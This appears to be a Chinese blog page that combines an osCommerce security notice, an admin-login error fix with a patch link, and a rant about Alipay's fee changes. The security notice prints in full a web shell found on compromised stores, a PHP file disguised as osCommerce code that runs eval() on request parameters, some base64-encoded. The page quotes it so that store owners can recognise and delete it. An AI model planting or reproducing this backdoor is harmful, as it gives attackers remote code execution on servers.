该漏洞引起的问题如要特征如下：

1）服务器上被载入额外的php文件，例如：
/catalog/images/btaxf/index.php
其中btaxf文件夹名字是随机组合，有的受攻击者机器上的目录名为yahoo

2）该index.php文件的权限是nobody，例如：
-rwxrwxrwx 1 nobody nobody 1181 Apr 12 07:46 index.php*

3）主机会被用来群发垃圾邮件，黑客通过POST方式访问：
“POST /catalog/images/btaxf/index.php HTTP/1.1″ 200 2 “-” “PycURL/7.18.2″

4）该恶意增加index.php文件的代码如下：
/*
$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

Copyright (c) 2003 osCommerce

Released under the GNU General Public License
*/

// require('includes/application_top.php');
// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_addre
ss) . "' and customers_id != '" . (int)$customer_id . "'");

// $check_email = tep_db_fetch_array($check_email_query);
// if ($check_email["total"] > 0) {

// $error = true;
error_reporting(0);

// if (!tep_session_is_registered(‘customer_id’)) {
eval(stripslashes($_REQUEST['osc']));
// if (ACCOUNT_GENDER == ‘true’) {
// if ( ($gender != ‘m’) && ($gender != ‘f’) ) {
// $error = true;
eval(base64_decode($_REQUEST['osc64']));
// $messageStack->add(‘account_edit’, ENTRY_GENDER_ERROR);
// }

// }
// $navigation->set_snapshot();
if(!(count($_GET)+count($_POST)))echo “Open Source E-Commerce Solutions “, 2000+10, ” year”;
// tep_redirect(tep_href_link(FILENAME_LOGIN, ”, ‘SSL’));

// }

?>

由于涉及的osCommerce版本较多，官方未提供解决办法，请用户发现该index.php文件后必须删除。

Fatal error: Call to undefined function tep_admin_check_login() in /home2/voguecam/public_html/admin/includes/application_top.php on line 217

解决办法是替换新版补丁中的catalog\admin\includes\functions\general.php文件，覆盖对应位置。

新版补丁的下载地址是：
http://www.maxcapture.com/download/osc/debug/register_globals_v1.5.2-OSCGC.zip

本补丁仅用于为osCommerce大中华版2006专用，可解决“register_globals is disabled in php.ini”的问题。

这意味着，支付宝将给外部接口的用户带来它的“优惠”套餐，按最低6万一年的交易额支付接口年度租用费。

这个EMAIL没有得到我的重视， 原因很简单，首先支付接口的技术并不是支付宝公司专有的，用户可以自由选择他们喜欢的支付接口，只要用户能按照接口的技术要求修改程序，而且同意支付相关额度的费用；

其次，支付宝实在有点不要脸，5月份（就是刚开始按每笔收费3%后的几个月）就收到通知，说要全面停止按笔收费，改为按年度一次性收费。当时我就支付宝接口对PHP 程序支持不足的问题提出疑问，得到的回应是他们的工程师将免费为用户集成接口，并发给我一些代码，我一看，原来是网友raftcham提供的代码，看来支付宝把“拿来主义”应用得淋漓尽致了，这点做过PAYPAL接口开发的用户肯定觉得我没说错。而另一方面，支付宝还没有为最常见的几种网上商店程序提供官方或非官方的接口模块（包括osCommerce），这点真让人觉得马云是想钱想疯了。

再次，说到钱就伤感情， 很多使用支付宝接口的网店是中小型以下的，一年的交易额是难以达到2万，更不用说6万的最低消费了。虽然支付宝接口的套餐的确比按次支付接口使用费要便宜很多，但对于海量的小型网店来说，这样的强迫消费只能把他们赶尽杀绝，又或是选择投奔淘宝网开店。在马云的角度，这真是个一石二鸟的好计！如果我是马云，我会把想出这个鬼主意的员工升职加薪，最少给他一个区域经理做做，呵呵。

话说回来，支付宝今次也再次拖延了实施时间，但再不是5月拖到10月，因为他等不及了，阿里巴巴要上市，要在第一天把香港的散户套牢，要让香港人都做股东去，所以它10月20日过没两天，就把我这个还没有签约的小用户给挡在门外了。

不过，好在我还会那么一点编程，呵呵，几天时间把接口换到PAYPAL的中国贝宝上去了，希望马云没有被气死，人家可是免费使用的哦，呵呵~

我还是在网页上保留了原来支付宝接口的选择，各位有兴趣可以去测试一下，地址如下：

http://www.maxcapture.com/order/